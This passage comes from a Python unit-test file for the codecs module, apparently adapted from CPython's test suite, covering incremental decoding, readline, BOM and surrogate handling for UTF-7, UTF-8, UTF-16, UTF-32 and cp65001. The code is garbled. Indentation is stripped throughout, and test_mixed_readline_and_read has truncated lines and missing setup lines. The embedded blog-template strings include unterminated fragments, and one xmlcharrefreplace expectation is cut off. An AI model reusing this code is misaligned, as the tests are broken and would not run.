SIZEOF_WCHAR_T = -1
else:
SIZEOF_WCHAR_T = ctypes.sizeof(ctypes.c_wchar)
def coding_checker(self, coder):
def check(input, expect):
self.assertEqual(coder(input), (expect, len(input)))
return check
class Queue(object):
def __init__(self, buffer):
self._buffer = buffer
def write(self, chars):
self._buffer += chars
def read(self, size=-1):
if size<0:
s = self._buffer
self._buffer = self._buffer[:0]
return s
else:
s = self._buffer[:size]
self._buffer = self._buffer[size:]
return s
class MixInCheckStateHandling:
def check_state_handling_decode(self, encoding, u, s):
for i in range(len(s)+1):
d = codecs.getincrementaldecoder(encoding)()
part1 = d.decode(s[:i])
state = d.getstate()
self.assertIsInstance(state[1], int)
if not state[1]:
d.setstate((state[0][:0], 0))
self.assertTrue(not d.decode(state[0]))
self.assertEqual(state, d.getstate())
d = codecs.getincrementaldecoder(encoding)()
d.setstate(state)
part2 = d.decode(s[i:], True)
self.assertEqual(u, part1+part2)
def check_state_handling_encode(self, encoding, u, s):
for i in range(len(u)+1):
d = codecs.getincrementalencoder(encoding)()
part1 = d.encode(u[:i])
state = d.getstate()
d = codecs.getincrementalencoder(encoding)()
d.setstate(state)
part2 = d.encode(u[i:], True)
self.assertEqual(s, part1+part2)
@yp_unittest.skip_str_codecs
class ReadTest(MixInCheckStateHandling):
def check_partial(self, input, partialresults):
q = Queue(b"")
r = codecs.getreader(self.encoding)(q)
result = ""
for (c, partialresult) in zip(input.encode(self.encoding), partialresults):
q.write(bytes([c]))
result += r.read()
self.assertEqual(result, partialresult)
self.assertEqual(r.read(), "")
self.assertEqual(r.bytebuffer, b"")
# do the check again, this time using a incremental decoder
d = codecs.getincrementaldecoder(self.encoding)()
result = ""
for (c, partialresult) in zip(input.encode(self.encoding), partialresults):
result += d.decode(bytes([c]))
self.assertEqual(result, partialresult)
# check that there's nothing left in the buffers
self.assertEqual(d.decode(b"", True), "")
self.assertEqual(d.buffer, b"")
d.reset()
result = ""
for (c, partialresult) in zip(input.encode(self.encoding), partialresults):
result += d.decode(bytes([c]))
self.assertEqual(result, partialresult)
self.assertEqual(d.decode(b"", True), "")
self.assertEqual(d.buffer, b"")
# check iterdecode()
encoded = input.encode(self.encoding)
self.assertEqual(
input,
"".join(codecs.iterdecode([bytes([c]) for c in encoded], self.encoding))
)
def test_readline(self):
def getreader(input):
stream = io.BytesIO(input.encode(self.encoding))
return codecs.getreader(self.encoding)(stream)
def readalllines(input, keepends=True, size=None):
reader = getreader(input)
lines = []
while True:
line = reader.readline(size=size, keepends=keepends)
if not line:
break
lines.append(line)
return "|".join(lines)
s = "foo\nbar\r\nbaz\rspam\u2028eggs"
sexpected = "foo\n|bar\r\n|baz\r|spam\u2028|eggs"
sexpectednoends = "foo|bar|baz|spam|eggs"
self.assertEqual(readalllines(s, True), sexpected)
self.assertEqual(readalllines(s, False), sexpectednoends)
self.assertEqual(readalllines(s, True, 10), sexpected)
self.assertEqual(readalllines(s, False, 10), sexpectednoends)
lineends = ("\n", "\r\n", "\r", "\u2028")
# Test long lines (multiple calls to read() in readline())
vw = []
vwo = []
for (i, lineend) in enumerate(lineends):
vw.append((i*200+200)*"\u3042" + lineend)
vwo.append((i*200+200)*"\u3042")
self.assertEqual(readalllines("".join(vw), True), "|".join(vw))
self.assertEqual(readalllines("".join(vw), False), "|".join(vwo))
# Test lines where the first read might end with \r, so the
# reader has to look ahead whether this is a lone \r or a \r\n
for size in range(80):
for lineend in lineends:
s = 10*(size*"a" + lineend + "xxx\n")
reader = getreader(s)
for i in range(10):
self.assertEqual(
reader.readline(keepends=True),
size*"a" + lineend,
)
self.assertEqual(
reader.readline(keepends=True),
"xxx\n",
)
reader = getreader(s)
for i in range(10):
self.assertEqual(
reader.readline(keepends=False),
size*"a",
)
self.assertEqual(
reader.readline(keepends=False),
"xxx",
)
def test_mixed_readline_and_read(self):
lines = ["Humpty Dumpty sat on a wall,\n",
"Humpty Dumpty had a great fall.\r\n",
"All the king's horses and all the king's men\r",
"Couldn't put Humpty together again."]
data = ''.join(lines)
def getreader():
stream = io.BytesIO(data.encode(self.encoding))
return codecs.getreader(self.encoding)(stream)
ertEqual(f.readline(), lines[0])
self.assertEqual(f.read(), ''.join(lines[1:]))
self.assertEqual(f.read(), '')
al(f.readline(), lines[0])
self.assertEqual(f.readlines(), lines[1:])
self.assertEqual(f.read(), '')
f = getreader()
self.assertEqual(f.read(size=40, chars=5), data[:5])
self.assertEqual(f.read(), data[5:])
self.assertEqual(f.read(), '')
tEqual(f.read(size=40, chars=5), data[:5])
self.assertEqual(f.readlines(), [lines[0][5:]] + lines[1:])
self.assertEqual(f.read(), '')
def test_bug1175396(self):
s = [
'<%!--===================================================\r\n',
' BLOG index page: show recent articles,\r\n',
' today\'s articles, or articles of a specific date.\r\n',
'========================================================--%>\r\n',
'<%@inputencoding="ISO-8859-1"%>\r\n',
'<%@pagetemplate=TEMPLATE.y%>\r\n',
'<%@import=import frog.util, frog%>\r\n',
'<%@import=import frog.objects%>\r\n',
'<%@import=from frog.storageerrors import StorageError%>\r\n',
'<%\r\n',
'\r\n',
'import logging\r\n',
'log=logging.getLogger("Snakelets.logger")\r\n',
'\r\n',
'\r\n',
'user=self.SessionCtx.user\r\n',
'storageEngine=self.SessionCtx.storageEngine\r\n',
'\r\n',
'\r\n',
'def readArticlesFromDate(date, count=None):\r\n',
' entryids=storageEngine.listBlogEntries(date)\r\n',
' entryids.reverse()
' if count:\r\n',
' entryids=entryids[:count]\r\n',
' try:\r\n',
' return [ frog.objects.BlogEntry.load(storageEngine, date, Id) for Id in entryids ]\r\n',
' except StorageError,x:\r\n',
' log.error("Error loading articles: "+str(x))\r\n',
' self.abort("cannot load articles")\r\n',
'\r\n',
'showdate=None\r\n',
'\r\n',
'arg=self.Request.getArg()\r\n',
'if arg=="today":\r\n',
'
' self.write("<h2>Today\'s articles</h2>")\r\n',
' showdate = frog.util.isodatestr() \r\n',
' entries = readArticlesFromDate(showdate)\r\n',
'elif arg=="active":\r\n',
'
' self.Yredirect("active.y")\r\n',
'elif arg=="login":\r\n',
'
' self.Yredirect("login.y")\r\n',
'elif arg=="date":\r\n',
'
' showdate = self.Request.getParameter("date")\r\n',
' self.write("<h2>Articles written on %s</h2>"% frog.util.mediumdatestr(showdate))\r\n',
' entries = readArticlesFromDate(showdate)\r\n',
'else:\r\n',
'
' self.write("<h2>Recent articles</h2>")\r\n',
' dates=storageEngine.listBlogEntryDates()\r\n',
' if dates:\r\n',
' entries=[]\r\n',
' SHOWAMOUNT=10\r\n',
' for showdate in dates:\r\n',
' entries.extend( readArticlesFromDate(showdate, SHOWAMOUNT-len(entries)) )\r\n',
' if len(entries)>=SHOWAMOUNT:\r\n',
' break\r\n',
' \r\n',
]
stream = io.BytesIO("".join(s).encode(self.encoding))
reader = codecs.getreader(self.encoding)(stream)
for (i, line) in enumerate(reader):
self.assertEqual(line, s[i])
def test_readlinequeue(self):
q = Queue(b"")
writer = codecs.getwriter(self.encoding)(q)
reader = codecs.getreader(self.encoding)(q)
# No lineends
writer.write("foo\r")
self.assertEqual(reader.readline(keepends=False), "foo")
writer.write("\nbar\r")
self.assertEqual(reader.readline(keepends=False), "")
self.assertEqual(reader.readline(keepends=False), "bar")
writer.write("baz")
self.assertEqual(reader.readline(keepends=False), "baz")
self.assertEqual(reader.readline(keepends=False), "")
# Lineends
writer.write("foo\r")
self.assertEqual(reader.readline(keepends=True), "foo\r")
writer.write("\nbar\r")
self.assertEqual(reader.readline(keepends=True), "\n")
self.assertEqual(reader.readline(keepends=True), "bar\r")
writer.write("baz")
self.assertEqual(reader.readline(keepends=True), "baz")
self.assertEqual(reader.readline(keepends=True), "")
writer.write("foo\r\n")
self.assertEqual(reader.readline(keepends=True), "foo\r\n")
def test_bug1098990_a(self):
s1 = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy\r\n"
s2 = "offending line: ladfj askldfj klasdj fskla dfzaskdj fasklfj laskd fjasklfzzzzaa%whereisthis!!!\r\n"
s3 = "next line.\r\n"
s = (s1+s2+s3).encode(self.encoding)
stream = io.BytesIO(s)
reader = codecs.getreader(self.encoding)(stream)
self.assertEqual(reader.readline(), s1)
self.assertEqual(reader.readline(), s2)
self.assertEqual(reader.readline(), s3)
self.assertEqual(reader.readline(), "")
def test_bug1098990_b(self):
s1 = "aaaaaaaaaaaaaaaaaaaaaaaa\r\n"
s2 = "bbbbbbbbbbbbbbbbbbbbbbbb\r\n"
s3 = "stillokay:bbbbxx\r\n"
s4 = "broken!!!!badbad\r\n"
s5 = "againokay.\r\n"
s = (s1+s2+s3+s4+s5).encode(self.encoding)
stream = io.BytesIO(s)
reader = codecs.getreader(self.encoding)(stream)
self.assertEqual(reader.readline(), s1)
self.assertEqual(reader.readline(), s2)
self.assertEqual(reader.readline(), s3)
self.assertEqual(reader.readline(), s4)
self.assertEqual(reader.readline(), s5)
self.assertEqual(reader.readline(), "")
ill_formed_sequence_replace = "\ufffd"
def test_lone_surrogates(self):
self.assertRaises(UnicodeEncodeError, "\ud800".encode, self.encoding)
self.assertEqual("[\uDC80]".encode(self.encoding, "backslashreplace"),
"[\\udc80]".encode(self.encoding))
self.assertEqual("[\uDC80]".encode(self.encoding, "xmlcharrefreplace"),
"[�]".encode(self.encoding))
self.assertEqual("[\uDC80]".encode(self.encoding, "ignore"),
"[]".encode(self.encoding))
self.assertEqual("[\uDC80]".encode(self.encoding, "replace"),
"[?]".encode(self.encoding))
bom = "".encode(self.encoding)
for before, after in [("\U00010fff", "A"), ("[", "]"),
("A", "\U00010fff")]:
before_sequence = before.encode(self.encoding)[len(bom):]
after_sequence = after.encode(self.encoding)[len(bom):]
test_string = before + "\uDC80" + after
test_sequence = (bom + before_sequence +
self.ill_formed_sequence + after_sequence)
self.assertRaises(UnicodeDecodeError, test_sequence.decode,
self.encoding)
self.assertEqual(test_string.encode(self.encoding,
"surrogatepass"),
test_sequence)
self.assertEqual(test_sequence.decode(self.encoding,
"surrogatepass"),
test_string)
self.assertEqual(test_sequence.decode(self.encoding, "ignore"),
before + after)
self.assertEqual(test_sequence.decode(self.encoding, "replace"),
before + self.ill_formed_sequence_replace + after)
@yp_unittest.skip_str_codecs
class UTF32Test(ReadTest, yp_unittest.TestCase):
encoding = "utf-32"
if sys.byteorder == 'little':
ill_formed_sequence = b"\x80\xdc\x00\x00"
else:
ill_formed_sequence = b"\x00\x00\xdc\x80"
spamle = (b'\xff\xfe\x00\x00'
b's\x00\x00\x00p\x00\x00\x00a\x00\x00\x00m\x00\x00\x00'
b's\x00\x00\x00p\x00\x00\x00a\x00\x00\x00m\x00\x00\x00')
spambe = (b'\x00\x00\xfe\xff'
b'\x00\x00\x00s\x00\x00\x00p\x00\x00\x00a\x00\x00\x00m'
b'\x00\x00\x00s\x00\x00\x00p\x00\x00\x00a\x00\x00\x00m')
def test_only_one_bom(self):
_,_,reader,writer = codecs.lookup(self.encoding)
# encode some stream
s = io.BytesIO()
f = writer(s)
f.write("spam")
f.write("spam")
d = s.getvalue()
# check whether there is exactly one BOM in it
self.assertTrue(d == self.spamle or d == self.spambe)
# try to read it back
s = io.BytesIO(d)
f = reader(s)
self.assertEqual(f.read(), "spamspam")
def test_badbom(self):
s = io.BytesIO(4*b"\xff")
f = codecs.getreader(self.encoding)(s)
self.assertRaises(UnicodeError, f.read)
s = io.BytesIO(8*b"\xff")
f = codecs.getreader(self.encoding)(s)
self.assertRaises(UnicodeError, f.read)
def test_partial(self):
self.check_partial(
"\x00\xff\u0100\uffff\U00010000",
[
"", # first byte of BOM read
"", # second byte of BOM read
"", # third byte of BOM read
"", # fourth byte of BOM read => byteorder known
"",
"",
"",
"\x00",
"\x00",
"\x00",
"\x00",
"\x00\xff",
"\x00\xff",
"\x00\xff",
"\x00\xff",
"\x00\xff\u0100",
"\x00\xff\u0100",
"\x00\xff\u0100",
"\x00\xff\u0100",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff\U00010000",
]
)
def test_handlers(self):
self.assertEqual(('\ufffd', 1),
codecs.utf_32_decode(b'\x01', 'replace', True))
self.assertEqual(('', 1),
codecs.utf_32_decode(b'\x01', 'ignore', True))
def test_errors(self):
self.assertRaises(UnicodeDecodeError, codecs.utf_32_decode,
b"\xff", "strict", True)
def test_decoder_state(self):
self.check_state_handling_decode(self.encoding,
"spamspam", self.spamle)
self.check_state_handling_decode(self.encoding,
"spamspam", self.spambe)
def test_issue8941(self):
# Issue #8941: insufficient result allocation when decoding into
# surrogate pairs on UCS-2 builds.
encoded_le = b'\xff\xfe\x00\x00' + b'\x00\x00\x01\x00' * 1024
self.assertEqual('\U00010000' * 1024,
codecs.utf_32_decode(encoded_le)[0])
encoded_be = b'\x00\x00\xfe\xff' + b'\x00\x01\x00\x00' * 1024
self.assertEqual('\U00010000' * 1024,
codecs.utf_32_decode(encoded_be)[0])
@yp_unittest.skip_str_codecs
class UTF32LETest(ReadTest, yp_unittest.TestCase):
encoding = "utf-32-le"
ill_formed_sequence = b"\x80\xdc\x00\x00"
def test_partial(self):
self.check_partial(
"\x00\xff\u0100\uffff\U00010000",
[
"",
"",
"",
"\x00",
"\x00",
"\x00",
"\x00",
"\x00\xff",
"\x00\xff",
"\x00\xff",
"\x00\xff",
"\x00\xff\u0100",
"\x00\xff\u0100",
"\x00\xff\u0100",
"\x00\xff\u0100",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff\U00010000",
]
)
def test_simple(self):
self.assertEqual("\U00010203".encode(self.encoding), b"\x03\x02\x01\x00")
def test_errors(self):
self.assertRaises(UnicodeDecodeError, codecs.utf_32_le_decode,
b"\xff", "strict", True)
def test_issue8941(self):
# Issue #8941: insufficient result allocation when decoding into
# surrogate pairs on UCS-2 builds.
encoded = b'\x00\x00\x01\x00' * 1024
self.assertEqual('\U00010000' * 1024,
codecs.utf_32_le_decode(encoded)[0])
@yp_unittest.skip_str_codecs
class UTF32BETest(ReadTest, yp_unittest.TestCase):
encoding = "utf-32-be"
ill_formed_sequence = b"\x00\x00\xdc\x80"
def test_partial(self):
self.check_partial(
"\x00\xff\u0100\uffff\U00010000",
[
"",
"",
"",
"\x00",
"\x00",
"\x00",
"\x00",
"\x00\xff",
"\x00\xff",
"\x00\xff",
"\x00\xff",
"\x00\xff\u0100",
"\x00\xff\u0100",
"\x00\xff\u0100",
"\x00\xff\u0100",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff\U00010000",
]
)
def test_simple(self):
self.assertEqual("\U00010203".encode(self.encoding), b"\x00\x01\x02\x03")
def test_errors(self):
self.assertRaises(UnicodeDecodeError, codecs.utf_32_be_decode,
b"\xff", "strict", True)
def test_issue8941(self):
# Issue #8941: insufficient result allocation when decoding into
# surrogate pairs on UCS-2 builds.
encoded = b'\x00\x01\x00\x00' * 1024
self.assertEqual('\U00010000' * 1024,
codecs.utf_32_be_decode(encoded)[0])
@yp_unittest.skip_str_codecs
class UTF16Test(ReadTest, yp_unittest.TestCase):
encoding = "utf-16"
if sys.byteorder == 'little':
ill_formed_sequence = b"\x80\xdc"
else:
ill_formed_sequence = b"\xdc\x80"
spamle = b'\xff\xfes\x00p\x00a\x00m\x00s\x00p\x00a\x00m\x00'
spambe = b'\xfe\xff\x00s\x00p\x00a\x00m\x00s\x00p\x00a\x00m'
def test_only_one_bom(self):
_,_,reader,writer = codecs.lookup(self.encoding)
# encode some stream
s = io.BytesIO()
f = writer(s)
f.write("spam")
f.write("spam")
d = s.getvalue()
# check whether there is exactly one BOM in it
self.assertTrue(d == self.spamle or d == self.spambe)
# try to read it back
s = io.BytesIO(d)
f = reader(s)
self.assertEqual(f.read(), "spamspam")
def test_badbom(self):
s = io.BytesIO(b"\xff\xff")
f = codecs.getreader(self.encoding)(s)
self.assertRaises(UnicodeError, f.read)
s = io.BytesIO(b"\xff\xff\xff\xff")
f = codecs.getreader(self.encoding)(s)
self.assertRaises(UnicodeError, f.read)
def test_partial(self):
self.check_partial(
"\x00\xff\u0100\uffff\U00010000",
[
"", # first byte of BOM read
"", # second byte of BOM read => byteorder known
"",
"\x00",
"\x00",
"\x00\xff",
"\x00\xff",
"\x00\xff\u0100",
"\x00\xff\u0100",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff\U00010000",
]
)
def test_handlers(self):
self.assertEqual(('\ufffd', 1),
codecs.utf_16_decode(b'\x01', 'replace', True))
self.assertEqual(('', 1),
codecs.utf_16_decode(b'\x01', 'ignore', True))
def test_errors(self):
self.assertRaises(UnicodeDecodeError, codecs.utf_16_decode,
b"\xff", "strict", True)
def test_decoder_state(self):
self.check_state_handling_decode(self.encoding,
"spamspam", self.spamle)
self.check_state_handling_decode(self.encoding,
"spamspam", self.spambe)
def test_bug691291(self):
# Files are always opened in binary mode, even if no binary mode was
# specified. This means that no automatic conversion of '\n' is done
# on reading and writing.
s1 = 'Hello\r\nworld\r\n'
s = s1.encode(self.encoding)
self.addCleanup(support.unlink, support.TESTFN)
with open(support.TESTFN, 'wb') as fp:
fp.write(s)
with support.check_warnings(('', DeprecationWarning)):
reader = codecs.open(support.TESTFN, 'U', encoding=self.encoding)
with reader:
self.assertEqual(reader.read(), s1)
@yp_unittest.skip_str_codecs
class UTF16LETest(ReadTest, yp_unittest.TestCase):
encoding = "utf-16-le"
ill_formed_sequence = b"\x80\xdc"
def test_partial(self):
self.check_partial(
"\x00\xff\u0100\uffff\U00010000",
[
"",
"\x00",
"\x00",
"\x00\xff",
"\x00\xff",
"\x00\xff\u0100",
"\x00\xff\u0100",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff\U00010000",
]
)
def test_errors(self):
tests = [
(b'\xff', '\ufffd'),
(b'A\x00Z', 'A\ufffd'),
(b'A\x00B\x00C\x00D\x00Z', 'ABCD\ufffd'),
(b'\x00\xd8', '\ufffd'),
(b'\x00\xd8A', '\ufffd'),
(b'\x00\xd8A\x00', '\ufffdA'),
(b'\x00\xdcA\x00', '\ufffdA'),
]
for raw, expected in tests:
self.assertRaises(UnicodeDecodeError, codecs.utf_16_le_decode,
raw, 'strict', True)
self.assertEqual(raw.decode('utf-16le', 'replace'), expected)
def test_nonbmp(self):
self.assertEqual("\U00010203".encode(self.encoding),
b'\x00\xd8\x03\xde')
self.assertEqual(b'\x00\xd8\x03\xde'.decode(self.encoding),
"\U00010203")
@yp_unittest.skip_str_codecs
class UTF16BETest(ReadTest, yp_unittest.TestCase):
encoding = "utf-16-be"
ill_formed_sequence = b"\xdc\x80"
def test_partial(self):
self.check_partial(
"\x00\xff\u0100\uffff\U00010000",
[
"",
"\x00",
"\x00",
"\x00\xff",
"\x00\xff",
"\x00\xff\u0100",
"\x00\xff\u0100",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff",
"\x00\xff\u0100\uffff\U00010000",
]
)
def test_errors(self):
tests = [
(b'\xff', '\ufffd'),
(b'\x00A\xff', 'A\ufffd'),
(b'\x00A\x00B\x00C\x00DZ', 'ABCD\ufffd'),
(b'\xd8\x00', '\ufffd'),
(b'\xd8\x00\xdc', '\ufffd'),
(b'\xd8\x00\x00A', '\ufffdA'),
(b'\xdc\x00\x00A', '\ufffdA'),
]
for raw, expected in tests:
self.assertRaises(UnicodeDecodeError, codecs.utf_16_be_decode,
raw, 'strict', True)
self.assertEqual(raw.decode('utf-16be', 'replace'), expected)
def test_nonbmp(self):
self.assertEqual("\U00010203".encode(self.encoding),
b'\xd8\x00\xde\x03')
self.assertEqual(b'\xd8\x00\xde\x03'.decode(self.encoding),
"\U00010203")
class UTF8Test(ReadTest, yp_unittest.TestCase):
encoding = "utf-8"
ill_formed_sequence = b"\xed\xb2\x80"
ill_formed_sequence_replace = "\ufffd" * 3
def test_partial(self):
self.check_partial(
"\x00\xff\u07ff\u0800\uffff\U00010000",
[
"\x00",
"\x00",
"\x00\xff",
"\x00\xff",
"\x00\xff\u07ff",
"\x00\xff\u07ff",
"\x00\xff\u07ff",
"\x00\xff\u07ff\u0800",
"\x00\xff\u07ff\u0800",
"\x00\xff\u07ff\u0800",
"\x00\xff\u07ff\u0800\uffff",
"\x00\xff\u07ff\u0800\uffff",
"\x00\xff\u07ff\u0800\uffff",
"\x00\xff\u07ff\u0800\uffff",
"\x00\xff\u07ff\u0800\uffff\U00010000",
]
)
def test_decoder_state(self):
u = "\x00\x7f\x80\xff\u0100\u07ff\u0800\uffff\U0010ffff"
self.check_state_handling_decode(self.encoding,
u, u.encode(self.encoding))
def test_lone_surrogates(self):
super().test_lone_surrogates()
# not sure if this is making sense for
# UTF-16 and UTF-32
self.assertEqual("[\uDC80]".encode('utf-8', "surrogateescape"),
b'[\x80]')
def test_surrogatepass_handler(self):
self.assertEqual("abc\ud800def".encode("utf-8", "surrogatepass"),
b"abc\xed\xa0\x80def")
self.assertEqual(b"abc\xed\xa0\x80def".decode("utf-8", "surrogatepass"),
"abc\ud800def")
self.assertEqual("\U00010fff\uD800".encode("utf-8", "surrogatepass"),
b"\xf0\x90\xbf\xbf\xed\xa0\x80")
self.assertEqual(b"\xf0\x90\xbf\xbf\xed\xa0\x80".decode("utf-8", "surrogatepass"),
"\U00010fff\uD800")
self.assertTrue(codecs.lookup_error("surrogatepass"))
with self.assertRaises(UnicodeDecodeError):
b"abc\xed\xa0".decode("utf-8", "surrogatepass")
with self.assertRaises(UnicodeDecodeError):
b"abc\xed\xa0z".decode("utf-8", "surrogatepass")
@yp_unittest.skipUnless(sys.platform == 'win32',
'cp65001 is a Windows-only codec')
@yp_unittest.skip_str_codecs
class CP65001Test(ReadTest, yp_unittest.TestCase):
encoding = "cp65001"
def test_encode(self):
tests = [
('abc', 'strict', b'abc'),
('\xe9\u20ac', 'strict', b'\xc3\xa9\xe2\x82\xac'),
('\U0010ffff', 'strict', b'\xf4\x8f\xbf\xbf'),
]
if VISTA_OR_LATER:
tests.extend((
('\udc80', 'strict', None),
('\udc80', 'ignore', b''),
('\udc80', 'replace', b'?'),
('\udc80', 'backslashreplace', b'\\udc80'),
('\udc80', 'surrogatepass', b'\xed\xb2\x80'),
))
else:
tests.append(('\udc80', 'strict', b'\xed\xb2\x80'))
for text, errors, expected in tests:
if expected is not None:
try:
encoded = text.encode('cp65001', errors)
except UnicodeEncodeError as err:
self.fail('Unable to encode %a to cp65001 with '
'errors=%r: %s' % (text, errors, err))
self.assertEqual(encoded, expected,
'%a.encode("cp65001", %r)=%a != %a'
% (text, errors, encoded, expected))
else:
self.assertRaises(UnicodeEncodeError,
text.encode, "cp65001", errors)
def test_decode(self):
tests = [
(b'abc', 'strict', 'abc'),
(b'\xc3\xa9\xe2\x82\xac', 'strict', '\xe9\u20ac'),
(b'\xf4\x8f\xbf\xbf', 'strict', '\U0010ffff'),
(b'\xef\xbf\xbd', 'strict', '\ufffd'),
(b'[\xc3\xa9]', 'strict', '[\xe9]'),
# invalid bytes
(b'[\xff]', 'strict', None),
(b'[\xff]', 'ignore', '[]'),
(b'[\xff]', 'replace', '[\ufffd]'),
(b'[\xff]', 'surrogateescape', '[\udcff]'),
]
if VISTA_OR_LATER:
tests.extend((
(b'[\xed\xb2\x80]', 'strict', None),
(b'[\xed\xb2\x80]', 'ignore', '[]'),
(b'[\xed\xb2\x80]', 'replace', '[\ufffd\ufffd\ufffd]'),
))
else:
tests.extend((
(b'[\xed\xb2\x80]', 'strict', '[\udc80]'),
))
for raw, errors, expected in tests:
if expected is not None:
try:
decoded = raw.decode('cp65001', errors)
except UnicodeDecodeError as err:
self.fail('Unable to decode %a from cp65001 with '
'errors=%r: %s' % (raw, errors, err))
self.assertEqual(decoded, expected,
'%a.decode("cp65001", %r)=%a != %a'
% (raw, errors, decoded, expected))
else:
self.assertRaises(UnicodeDecodeError,
raw.decode, 'cp65001', errors)
@yp_unittest.skipUnless(VISTA_OR_LATER, 'require Windows Vista or later')
def test_lone_surrogates(self):
self.assertRaises(UnicodeEncodeError, "\ud800".encode, "cp65001")
self.assertRaises(UnicodeDecodeError, b"\xed\xa0\x80".decode, "cp65001")
self.assertEqual("[\uDC80]".encode("cp65001", "backslashreplace"),
b'[\\udc80]')
self.assertEqual("[\uDC80]".encode("cp65001", "xmlcharrefreplace"),
b'[&
self.assertEqual("[\uDC80]".encode("cp65001", "surrogateescape"),
b'[\x80]')
self.assertEqual("[\uDC80]".encode("cp65001", "ignore"),
b'[]')
self.assertEqual("[\uDC80]".encode("cp65001", "replace"),
b'[?]')
@yp_unittest.skipUnless(VISTA_OR_LATER, 'require Windows Vista or later')
def test_surrogatepass_handler(self):
self.assertEqual("abc\ud800def".encode("cp65001", "surrogatepass"),
b"abc\xed\xa0\x80def")
self.assertEqual(b"abc\xed\xa0\x80def".decode("cp65001", "surrogatepass"),
"abc\ud800def")
self.assertEqual("\U00010fff\uD800".encode("cp65001", "surrogatepass"),
b"\xf0\x90\xbf\xbf\xed\xa0\x80")
self.assertEqual(b"\xf0\x90\xbf\xbf\xed\xa0\x80".decode("cp65001", "surrogatepass"),
"\U00010fff\uD800")
self.assertTrue(codecs.lookup_error("surrogatepass"))
def test_readline(self):
self.skipTest("issue #20571: code page 65001 codec does not "
"support partial decoder yet")
@yp_unittest.skip_str_codecs
class UTF7Test(ReadTest, yp_unittest.TestCase):
encoding = "utf-7"
def test_partial(self):
self.check_partial(
'a+-b\x00c\x80d\u0100e\U00010000f',
[
'a',
'a',
'a+',
'a+-',
'a+-b',
'a+-b',
'a+-b',
'a+-b',
'a+-b',
'a+-b\x00',
'a+-b\x00c',
'a+-b\x00c',
'a+-b\x00c',
'a+-b\x00c',
'a+-b\x00c',
'a+-b\x00c\x80',
'a+-b\x00c\x80d',
'a+-b\x00c\x80d',
'a+-b\x00c\x80d',
'a+-b\x00c\x80d',
'a+-b\x00c\x80d',
'a+-b\x00c\x80d\u0100',
'a+-b\x00c\x80d\u0100e',
'a+-b\x00c\x80d\u0100e',
'a+-b\x00c\x80d\u0100e',
'a+-b\x00c\x80d\u0100e',
'a+-b\x00c\x80d\u0100e',
'a+-b\x00c\x80d\u0100e',
'a+-b\x00c\x80d\u0100e',
'a+-b\x00c\x80d\u0100e',
'a+-b\x00c\x80d\u0100e\U00010000',
'a+-b\x00c\x80d\u0100e\U00010000f',
]
)
def test_errors(self):
tests = [
(b'a\xffb', 'a\ufffdb'),
(b'a+IK', 'a\ufffd'),
(b'a+IK-b', 'a\ufffdb'),
(b'a+IK,b', 'a\ufffdb'),
(b'a+IKx', 'a\u20ac\ufffd'),
(b'a+IKx-b', 'a\u20ac\ufffdb'),
(b'a+IKwgr', 'a\u20ac\ufffd'),
(b'a+IKwgr-b', 'a\u20ac\ufffdb'),
(b'a+IKwgr,', 'a\u20ac\ufffd'),
(b'a+IKwgr,-b', 'a\u20ac\ufffd-b'),
(b'a+IKwgrB', 'a\u20ac\u20ac\ufffd'),
(b'a+IKwgrB-b', 'a\u20ac\u20ac\ufffdb'),
(b'a+/,+IKw-b', 'a\ufffd\u20acb'),
(b'a+//,+IKw-b', 'a\ufffd\u20acb'),
(b'a+///,+IKw-b', 'a\uffff\ufffd\u20acb'),
(b'a+////,+IKw-b', 'a\uffff\ufffd\u20acb'),
]
for raw, expected in tests:
with self.subTest(raw=raw):
self.assertRaises(UnicodeDecodeError, codecs.utf_7_decode,
raw, 'strict', True)
self.assertEqual(raw.decode('utf-7', 'replace'), expected)
def test_nonbmp(self):
self.assertEqual('\U000104A0'.encode(self.encoding), b'+2AHcoA-')
self.assertEqual('\ud801\udca0'.encode(self.encoding), b'+2AHcoA-')
self.assertEqual(b'+2AHcoA-'.decode(self.encoding), '\U000104A0')
test_lone_surrogates = None
@yp_unittest.skip_str_codecs
class UTF16ExTest(yp_unittest.TestCase):
def test_errors(self):
self.assertRaises(UnicodeDecodeError, codecs.utf_16_ex_decode, b"\xff", "strict", 0, True)
def test_bad_args(self):
self.assertRaises(TypeError, codecs.utf_16_ex_decode)
@yp_unittest.skip_str_codecs
class ReadBufferTest(yp_unittest.TestCase):
def test_array(self):
import array
self.assertEqual(
codecs.readbuffer_encode(array.array("b", b"spam")),
(b"spam", 4)
)
def test_empty(self):
self.assertEqual(codecs.readbuffer_encode(""), (b"", 0))
def test_bad_args(self):
self.assertRaises(TypeError, codecs.readbuffer_encode)
self.assertRaises(TypeError, codecs.readbuffer_encode, 42)
@yp_unittest.skip_str_codecs
class UTF8SigTest(UTF8Test, yp_unittest.TestCase):
encoding = "utf-8-sig"
def test_partial(self):
self.check_partial(
"\ufeff\x00\xff\u07ff\u0800\uffff\U00010000",
[
"",
"",
"", # First BOM has been read and skipped
"",
"",
"\ufeff", # Second BOM has been read and emitted
"\ufeff\x00", # "\x00" read and emitted
"\ufeff\x00", # First byte of encoded "\xff" read
"\ufeff\x00\xff", # Second byte of encoded "\xff" read
"\ufeff\x00\xff", # First byte of encoded "\u07ff" read
"\ufeff\x00\xff\u07ff", # Second byte of encoded "\u07ff" read
"\ufeff\x00\xff\u07ff",
"\ufeff\x00\xff\u07ff",
"\ufeff\x00\xff\u07ff\u0800",
"\ufeff\x00\xff\u07ff\u0800",
"\ufeff\x00\xff\u07ff\u0800",
"\ufeff\x00\xff\u07ff\u0800\uffff",
